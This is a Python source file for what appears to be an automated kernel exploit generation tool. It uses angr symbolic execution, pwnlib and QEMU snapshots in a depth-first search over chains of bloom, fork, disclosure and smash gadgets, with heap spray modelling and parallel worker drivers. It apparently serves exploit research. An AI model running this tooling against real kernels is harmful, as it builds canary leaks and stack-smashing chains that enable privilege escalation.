import pickle
import os
import time
import datetime
import angr
import colorama
import pwnlib
import time
from IPython import embed
from multiprocessing import Process, Pool, Queue


class ExploitRoutineDFSMixin:
    """DFS-style search over chains of (bloom, fork, prologue/disclosure,
    smash) gadgets, plus single-shot and multi-process driver entry points.

    NOTE(review): this mixin relies on the composing class / sibling mixins
    for the gadget lists (``bloom_gadgets``, ``fork_gadgets``,
    ``prologue_disclosure_pairs``), the symbolic-execution helpers
    (``run_bloom_gadget``, ``run_forking_gadget``, ...) and the QEMU
    snapshot plumbing -- confirm against the host class.
    """

    def _smash(self, start_good_disclosure_state_idx):
        """
        Try all candidate smash gadgets against each good disclosure state,
        starting from the given index; stop at the first success.

        :param start_good_disclosure_state_idx: index into
            ``self.good_disclosure_state`` of the first state to try
        :return: None
        """
        for good_disclosure_state in self.good_disclosure_state[start_good_disclosure_state_idx:]:
            if self.multiple_runs_smash_gadgets(good_disclosure_state):
                break  # at least we got a good smash state
        return

    def _leak(self):
        """
        Use the most recent good (bloom, fork) gadget pair to try to leak the
        current stack canary; every newly discovered disclosure state is
        immediately handed to :meth:`_smash`.

        :return: None
        """
        good_bloom_fork_pair = self.good_bloom_fork_gadget_pair[-1]
        number_of_old_good_disclosure_gadget = len(self.good_disclosure_state)
        # we will perform symbolic tracing to reach the first fork site
        print('[+] multiple runs bloom and fork gadget')
        bloom_gadget = good_bloom_fork_pair[0]
        forking_gadget = good_bloom_fork_pair[1]
        constraints = good_bloom_fork_pair[2]  # unused here; kept to document the tuple layout
        constraints_at_first_fork_site = good_bloom_fork_pair[3]  # unused here
        history_bbl_addrs = good_bloom_fork_pair[4]
        first_reached_fork_site = good_bloom_fork_pair[5]
        self.current_bloom_gadget = bloom_gadget  # set current bloom gadget
        self.current_forking_gadget = forking_gadget  # set current_forking_gadget
        self.current_firstly_reached_fork_site = first_reached_fork_site
        initial_state = self.initial_state

        # codes 1/3 mean the first fork site was hit first, 2/4 the second
        if first_reached_fork_site in (1, 3):
            print('firstly reach first fork site')
        elif first_reached_fork_site in (2, 4):
            print('firstly reach second fork site')
        else:
            assert 0, 'unexpected first_reached_fork_site: %r' % (first_reached_fork_site,)
        self.tmp_good_disclosure_state_number = 0

        # keep retrying symbolic tracing until we reach the first fork site;
        # tracing does not succeed on every attempt, so allow up to 15 tries
        fork_site_state = None
        trial_number = 0
        while fork_site_state is None and trial_number < 15:
            tmp_state = initial_state.copy()
            fork_site_state = self.run_symbolic_tracing_to_first_fork_site(
                tmp_state, bloom_gadget, forking_gadget, history_bbl_addrs,
                first_constraint_func=self.first_constraint_func)
            del tmp_state
            trial_number += 1
        if fork_site_state is None:  # never reached the fork site; give up
            print('failed symbolic tracing attempt')
            if self.debug_dfs:
                embed()
            return
        print('finished symbolic tracing')

        for i, prologue_disclosure_pair in enumerate(self.prologue_disclosure_pairs):
            print('====== checking %d/%d pair of prologue and disclosure gadget' % (
                i, len(self.prologue_disclosure_pairs)))
            tmp_state = fork_site_state.copy()
            prologue_gadget = prologue_disclosure_pair[0]
            prologue_entry = prologue_gadget[6]
            # constrain the first fork site to the entry of the prologue
            # function and check satisfiability before going any further
            tmp_state.add_constraints(tmp_state.regs.rip == prologue_entry)
            if not tmp_state.satisfiable():
                print('[+] can not constrain rip to this prologue gadget', prologue_gadget)
                continue
            self.run_prologue_and_disclosure_gadget(tmp_state, bloom_gadget, forking_gadget,
                                                    prologue_disclosure_pair,
                                                    first_reached_fork_site,
                                                    first_constraint_func=None)
            # check whether the run above produced a new disclosure (leak) state
            if number_of_old_good_disclosure_gadget < len(self.good_disclosure_state):
                print('[+] found new good disclosure gadget, try smashing :)')
                # continue the chain: attempt smashing with the new state(s)
                self._smash(number_of_old_good_disclosure_gadget)
                number_of_old_good_disclosure_gadget = len(self.good_disclosure_state)
            del tmp_state

        del fork_site_state
        return

    def _fork(self, start_fork_idx=0, end_fork_idx=-1):
        """
        Try every forking gadget with index in [start_fork_idx, end_fork_idx)
        against the most recent good bloom state; descend into :meth:`_leak`
        whenever a new good (bloom, fork) pair is recorded.

        :param start_fork_idx: first fork-gadget index to try
        :param end_fork_idx: one past the last index to try; -1 means "to the end"
        :return: None
        """
        good_bloom_gadget = self.good_bloom_gadget[-1]
        print('[+] multiple runs forking gadget')
        bloom_gadget = good_bloom_gadget[0]
        bloom_state = good_bloom_gadget[1]
        self.current_bloom_gadget = bloom_gadget
        total = len(self.fork_gadgets)
        if end_fork_idx == -1:
            end_fork_idx = total
        for i, forking_gadget in enumerate(self.fork_gadgets):
            print('[+] ===== checking %d/%d th forking gadget...=====' % (i, total))
            print(forking_gadget)
            if i < start_fork_idx or i >= end_fork_idx:
                print('skip this fork gadget')
                continue
            tmp_state = bloom_state.copy()
            old_number_of_good_bloom_fork_gadget_pair = len(self.good_bloom_fork_gadget_pair)
            self.run_forking_gadget(tmp_state, good_bloom_gadget, forking_gadget)  # run fork gadget
            fork_entry, first_fork_site, second_fork_site = self.get_forking_gadget_entry_and_sites(forking_gadget)
            # remove the hooks installed at the forking sites so they do not
            # linger into the next iteration
            self.b.unhook(first_fork_site)
            self.b.unhook(second_fork_site)
            del tmp_state
            if old_number_of_good_bloom_fork_gadget_pair != len(self.good_bloom_fork_gadget_pair):
                # found a good (bloom, fork) pair; descend to the leak stage
                self._leak()
        return

    def _bloom(self, start_bloom_idx, only_once=False, start_fork_idx=0, end_fork_idx=-1):
        """
        Iterate over the bloom gadgets and descend into :meth:`_fork` for each
        gadget that yields a bloom state.

        :param start_bloom_idx: index of the first bloom gadget to consider
        :param only_once: if True, evaluate only the gadget at
            ``start_bloom_idx`` instead of everything from it onwards
        :param start_fork_idx: forwarded to :meth:`_fork`
        :param end_fork_idx: forwarded to :meth:`_fork`
        :return: None
        """
        total = len(self.bloom_gadgets)
        for i, bloom_gadget in enumerate(self.bloom_gadgets):
            # select which gadget indices to process
            if only_once:
                if i != start_bloom_idx:
                    continue
            elif i < start_bloom_idx:
                continue
            print('[+] ===== checking %d/%d th bloom gadget: ' % (i, total) + bloom_gadget[1].decode('utf-8')
                  + '... =====')
            self.draw_progress_bar(i, total)
            # some functions should be put in blacklist.
            # BUGFIX: gadget names appear to be bytes (see .decode above), so
            # the old str-only comparison could never match on Python 3;
            # accept both forms to stay backward-compatible.
            if bloom_gadget[1] in (b'udp_v6_early_demux', 'udp_v6_early_demux'):
                continue
            # (the original only_once/else branches here were identical)
            tmp_state = self.initial_state.copy()
            seen_bloom_state = self.run_bloom_gadget(tmp_state, bloom_gadget,
                                                     first_constraint_func=self.first_constraint_func)
            del tmp_state
            if seen_bloom_state:  # has found bloom state
                self._fork(start_fork_idx=start_fork_idx, end_fork_idx=end_fork_idx)  # do fork stage
        return

    def doit_dfs(self, use_qemu_snapshot=False, start_bloom_idx=0, debug_dfs=False, multiple_process=False):
        """
        Main DFS entry point.

        When ``use_qemu_snapshot`` is False this run only dumps the hyper
        parameters and takes the QEMU snapshot -- the search itself is only
        started on a later run with ``use_qemu_snapshot=True``.

        :param use_qemu_snapshot: load (True) or take (False) the snapshot
        :param start_bloom_idx: first bloom gadget index to search from
        :param debug_dfs: drop into IPython on tracing failures
        :param multiple_process: use the multi-threaded bloom driver
        """
        self.prologue_disclosure_pairs = self.get_prologue_disclosure_pairs()
        self.is_dfs_search_routine = True
        self.debug_dfs = debug_dfs
        self.use_qemu_snapshot = use_qemu_snapshot
        self.start_bloom_idx = start_bloom_idx
        if not use_qemu_snapshot:
            print('[+] taking snapshot')
            self.dump_hyper_parameters()
            self.take_qemu_snapshot()
            print('finished taking snapshot')
        else:
            # restore the state captured by a previous snapshot-taking run
            self.load_hyper_parameters()
            self.load_qemu_snapshot()

            # start dfs search for exploit chains
            if multiple_process:
                self._bloom_multiple_threads(start_bloom_idx)
            else:
                self._bloom(start_bloom_idx)
        return

    def doit_dfs_once(self, start_bloom_idx=0, start_fork_idx=0, end_fork_idx=-1):
        """
        Run the DFS for exactly one bloom gadget and one fork-gadget slice
        (the unit of work dispatched by the parallel drivers).
        """
        self.start_bloom_idx = start_bloom_idx
        self._bloom(start_bloom_idx, only_once=True, start_fork_idx=start_fork_idx, end_fork_idx=end_fork_idx)
        return

    def doit_bloom_only(self, start_bloom_idx=0, use_qemu_snapshot=True):
        """
        Evaluate every bloom gadget (from ``start_bloom_idx`` on) in isolation
        and log the indices of the good ones to ``bloom_log.txt``, one per
        line, for later consumption by :meth:`doit_parallel_v3`.
        """
        self.good_bloom_gadgets_index = []
        assert use_qemu_snapshot, 'bloom-only mode requires an existing qemu snapshot'
        self.use_qemu_snapshot = use_qemu_snapshot
        self.load_hyper_parameters()
        self.load_qemu_snapshot()
        self.initial_state = self.get_initial_state(control_memory_base=self.controlled_memory_base)
        if self.pause_on_init_state:
            print('init state ready')
            embed()
        total = len(self.bloom_gadgets)
        with open('bloom_log.txt', 'w') as bloom_log_file:
            self.bloom_log_file = bloom_log_file
            # BUGFIX: the original used enumerate(..., start=start_bloom_idx),
            # which only offsets the reported counter -- it does not skip the
            # first gadgets, so indices were shifted and everything was still
            # processed.  Skip explicitly instead (same idiom as _bloom).
            for i, bloom_gadget in enumerate(self.bloom_gadgets):
                if i < start_bloom_idx:
                    continue
                print('[+] ===== checking %d/%d th bloom gadget... =====' % (i, total))
                # blacklist; accept bytes and str forms (see _bloom)
                if bloom_gadget[1] in (b'udp_v6_early_demux', 'udp_v6_early_demux'):
                    continue
                tmp_state = self.initial_state.copy()
                seen_bloom_state = self.run_bloom_gadget(tmp_state, bloom_gadget,
                                                         first_constraint_func=self.first_constraint_func)
                del tmp_state
                if seen_bloom_state:
                    self.good_bloom_gadgets_index.append(i)
                    bloom_log_file.write(str(i) + '\n')
        time.sleep(2)  # NOTE(review): presumably lets background VM I/O settle -- confirm
        return

    def doit_relay_only(self, gap_size=None, use_qemu_snapshot=True, register_of_heap_ptr='rdi'):
        """
        Only evaluate relay gadgets: concretize the heap pages around the
        object pointed to by ``register_of_heap_ptr``, zero-fill that object,
        plant a fully symbolic "sprayed" object ``gap_size`` bytes after it,
        then run the relay gadgets.

        :param gap_size: distance in bytes between the victim object and the
            sprayed object; required
        :param use_qemu_snapshot: must be True (the snapshot provides state)
        :param register_of_heap_ptr: name of the register holding the heap
            pointer (default ``'rdi'``)
        """
        assert use_qemu_snapshot and gap_size is not None, 'need a qemu snapshot and a gap_size'
        self.relay_log_file = open('relay_log_' + str(gap_size), 'w')
        self.use_qemu_snapshot = use_qemu_snapshot
        self.load_hyper_parameters()
        self.load_qemu_snapshot()

        # get initial state
        self.initial_state = self.get_initial_state(control_memory_base=self.controlled_memory_base)

        # concretize heap region pointed to by the chosen register
        # (the original rdi special-case was identical to the generic path)
        reg = self.initial_state.registers.load(register_of_heap_ptr)
        rdi_page = reg & 0xfffffffffffff000  # page-align the heap pointer
        val = self.sol.eval(reg, 1)[0]
        next_chunk = val + gap_size  # address of the sprayed object
        self.r = pwnlib.tubes.remote.remote('127.0.0.1', self.qemu_port)
        # fetch the page itself plus both neighbouring pages from the live VM
        addr_to_concretize = [rdi_page, rdi_page + 0x1000, rdi_page - 0x1000]
        for addr in addr_to_concretize:
            con = self.statebroker.get_a_page(self.r, addr)
            if con is not None:
                self.set_concret_memory_region(self.initial_state, addr, con, 4096)
        # BUGFIX: memory.store expects bytes on Python 3; a str here raises
        zero_buf = b'\x00' * gap_size
        self.initial_state.memory.store(reg, zero_buf, inspect=False)
        # add extra symbolic value: one symbolic byte per position of the
        # sprayed object, remembered for later constraint solving
        self.auxiliary_spray_obj_bytes = []
        for i in range(gap_size):
            symbolic_byte = self.initial_state.se.BVS("spray_obj" + str(i), 8)
            self.auxiliary_spray_obj_bytes.append(symbolic_byte)
            self.initial_state.memory.store(next_chunk + i, symbolic_byte, inspect=False)
        self.r.close()

        self.multiple_run_relay_gadgets()
        self.relay_log_file.close()
        return

    def _fork_subtask_bounds(self, normalized_len_fork_gadget, sub_task_number):
        """
        Yield ``sub_task_number`` contiguous ``(start_fork_idx, end_fork_idx)``
        integer ranges partitioning ``range(normalized_len_fork_gadget)``.

        ``normalized_len_fork_gadget`` is expected to be a multiple of
        ``sub_task_number`` (callers round it up beforehand).
        """
        # BUGFIX: the original computed the slice boundary with true division,
        # which yields float fork indices on Python 3; use integer arithmetic.
        chunk = normalized_len_fork_gadget // sub_task_number
        start_fork_idx = 0
        for j in range(sub_task_number):
            end_fork_idx = (j + 1) * chunk
            yield start_fork_idx, end_fork_idx
            start_fork_idx = end_fork_idx

    def doit_parallel_v3(self, start_bloom_idx=0, only_use_good_bloom=False, processes=None, sub_task_number=None,
                         use_qemu_snapshot=True, debug_dfs=False):
        """
        Queue-based parallel driver: build (bloom_idx, fork-slice) tasks,
        push them on ``self.queue`` and consume them with ``processes``
        :meth:`osok_worker` processes.

        :param start_bloom_idx: first bloom gadget index to schedule
        :param only_use_good_bloom: restrict to the bloom indices previously
            logged to ``bloom_log.txt`` by :meth:`doit_bloom_only`
        :param processes: number of worker processes; required
        :param sub_task_number: fork-gadget slices per bloom gadget; required
        :param use_qemu_snapshot: must be True
        :param debug_dfs: drop into IPython on tracing failures
        """
        if only_use_good_bloom:
            assert os.path.isfile('bloom_log.txt'), 'bloom_log.txt missing; run doit_bloom_only first'
            self.good_bloom_gadgets_index = []
            with open('bloom_log.txt') as f:
                for log in f:
                    self.good_bloom_gadgets_index.append(int(log.strip()))

        assert use_qemu_snapshot and processes is not None and sub_task_number is not None
        # record the start time for bookkeeping
        with open('starttime.txt', 'a') as f:
            f.write(str(time.time()) + '\n')
        self.prologue_disclosure_pairs = self.get_prologue_disclosure_pairs()
        self.is_dfs_search_routine = True
        self.use_qemu_snapshot = use_qemu_snapshot
        self.debug_dfs = debug_dfs

        # init state (shared by every worker process via fork)
        self.load_hyper_parameters()
        initial_state = self.get_initial_state(switch_cpu=True,
                                               control_memory_base=self.controlled_memory_base,
                                               control_memory_size=self.controlled_memory_size)
        self.initial_state = initial_state
        if self.pause_on_init_state:
            print('init state ready')
            embed()

        # round the fork-gadget count up to a multiple of sub_task_number so
        # every slice has equal size
        len_fork_gadget = len(self.fork_gadgets)
        if len_fork_gadget % sub_task_number != 0:
            normalized_len_fork_gadget = len_fork_gadget + (sub_task_number - len_fork_gadget % sub_task_number)
        else:
            normalized_len_fork_gadget = len_fork_gadget

        # prepare task queue
        tasks = []
        for i in range(start_bloom_idx, len(self.bloom_gadgets)):
            if only_use_good_bloom and i not in self.good_bloom_gadgets_index:
                continue
            for start_fork_idx, end_fork_idx in self._fork_subtask_bounds(normalized_len_fork_gadget,
                                                                          sub_task_number):
                # in good-bloom mode, drop slices entirely past the real end
                # (preserves the original's asymmetry between the two modes)
                if only_use_good_bloom and start_fork_idx >= len_fork_gadget:
                    continue
                tasks.append((i, start_fork_idx, end_fork_idx,))

        print('there are in total %d tasks' % len(tasks))

        print('prepareing task queue')
        for task in tasks:
            print(task)
            self.queue.put(task)

        print('starting workers')
        worker_list = []
        for i in range(processes):
            p = Process(target=self.osok_worker, args=())
            p.start()
            worker_list.append(p)

        # one STOP sentinel per worker, then wait for all of them to drain
        for i in range(processes):
            self.queue.put('STOP')
        for p in worker_list:
            p.join()

    def osok_worker(self):
        """
        Worker loop: pull task tuples off ``self.queue`` until the ``'STOP'``
        sentinel, running each task in a fresh subprocess (isolating per-task
        memory usage of the symbolic execution).
        """
        for args in iter(self.queue.get, 'STOP'):
            print('args', args)
            p = Process(target=self.vm_test, args=args)
            p.start()
            p.join()

    def doit_parallel_v2(self, processes=None, sub_task_number=None, use_qemu_snapshot=True, debug_dfs=False):
        """
        Older Pool-based parallel driver over a hard-coded bloom index range.

        NOTE(review): ``apply_async`` immediately followed by ``res.get()``
        effectively serializes the tasks; kept as-is to preserve behavior.
        """
        assert use_qemu_snapshot and processes is not None and sub_task_number is not None
        # get a pool
        pool = Pool(processes=processes)
        self.prologue_disclosure_pairs = self.get_prologue_disclosure_pairs()
        self.is_dfs_search_routine = True
        self.use_qemu_snapshot = use_qemu_snapshot
        self.debug_dfs = debug_dfs

        # init state
        self.load_hyper_parameters()
        self.initial_state = self.get_initial_state()
        if self.pause_on_init_state:
            print('init state ready')
            embed()
        len_fork_gadget = len(self.fork_gadgets)
        if len_fork_gadget % sub_task_number != 0:
            normalized_len_fork_gadget = len_fork_gadget + (sub_task_number - len_fork_gadget % sub_task_number)
        else:
            normalized_len_fork_gadget = len_fork_gadget

        # hard-coded bloom index range -- presumably tuned for one specific
        # target kernel; TODO confirm before reuse
        for i in range(101, 1055):
            for start_fork_idx, end_fork_idx in self._fork_subtask_bounds(normalized_len_fork_gadget,
                                                                          sub_task_number):
                res = pool.apply_async(self.vm_test, (i, start_fork_idx, end_fork_idx,))
                res.get()

        pool.close()
        pool.join()

    def doit_parallel(self, task_number, use_qemu_snapshot=True, debug_dfs=False):
        """
        Residue-class parallel driver: spawn ``task_number`` subprocesses,
        each handling the bloom indices congruent to its remainder modulo
        ``task_number`` (see :meth:`test_fork_mem_efficient`).
        """
        self.prologue_disclosure_pairs = self.get_prologue_disclosure_pairs()
        self.is_dfs_search_routine = True
        self.use_qemu_snapshot = use_qemu_snapshot
        self.debug_dfs = debug_dfs
        self.task_number = task_number
        if not use_qemu_snapshot:
            print('[+] taking snapshot')
            self.dump_hyper_parameters()
            self.take_qemu_snapshot()
            print('finished taking snapshot')
        else:
            # init state
            self.load_hyper_parameters()
            # in parallel mode, all instances share one vm, so the snapshot
            # itself is not reloaded here
            initial_state = self.get_initial_state(switch_cpu=True,
                                                   control_memory_base=self.controlled_memory_base,
                                                   control_memory_size=self.controlled_memory_size)
            self.initial_state = initial_state
            if self.pause_on_init_state:
                embed()

        # fan out the residue classes, then wait for every worker
        execution_queue = []
        for remainder in range(task_number):
            p = Process(target=self.test_fork_mem_efficient, args=(remainder,))
            execution_queue.append(p)
        for task in execution_queue:
            task.start()
            print(task.pid)
        for task in execution_queue:
            task.join()

    def test_fork_mem_efficient(self, remainder=-1):
        """
        Subprocess body for :meth:`doit_parallel`: handle every bloom index
        in the hard-coded range whose value modulo ``self.task_number``
        equals ``remainder``, splitting the fork gadgets into 6 slices run
        in fresh subprocesses (keeps per-slice memory bounded).

        :param remainder: this worker's residue class; must be provided
        """
        assert remainder != -1
        len_fork_gadget = 254  # NOTE(review): hard-coded fork gadget count -- confirm
        for i in range(101, 1055):
            if i % self.task_number != remainder:
                continue
            start_fork_idx = 0
            end_fork_idx = -1
            for j in range(6):
                time.sleep(2)  # stagger subprocess start-up
                if end_fork_idx != -1:
                    start_fork_idx = end_fork_idx
                else:
                    start_fork_idx = 0
                # BUGFIX: integer division; the original's true division
                # produced float fork indices on Python 3.  Slices remain
                # contiguous and still cover all gadgets (6 * 42 + 5 > 254).
                end_fork_idx = (j + 1) * (len_fork_gadget // 6) + 5
                p = Process(target=self.vm_test, args=(i, start_fork_idx, end_fork_idx,))
                p.start()
                print('subprocess %d for handling remainder %d started' % (p.pid, remainder))
                p.join()
        print('end of subprocess:', remainder)

    def vm_test(self, start_bloom_idx, start_fork_idx=0, end_fork_idx=-1):
        """Subprocess entry point: run one (bloom gadget, fork slice) task."""
        self.doit_dfs_once(start_bloom_idx=start_bloom_idx,
                           start_fork_idx=start_fork_idx,
                           end_fork_idx=end_fork_idx)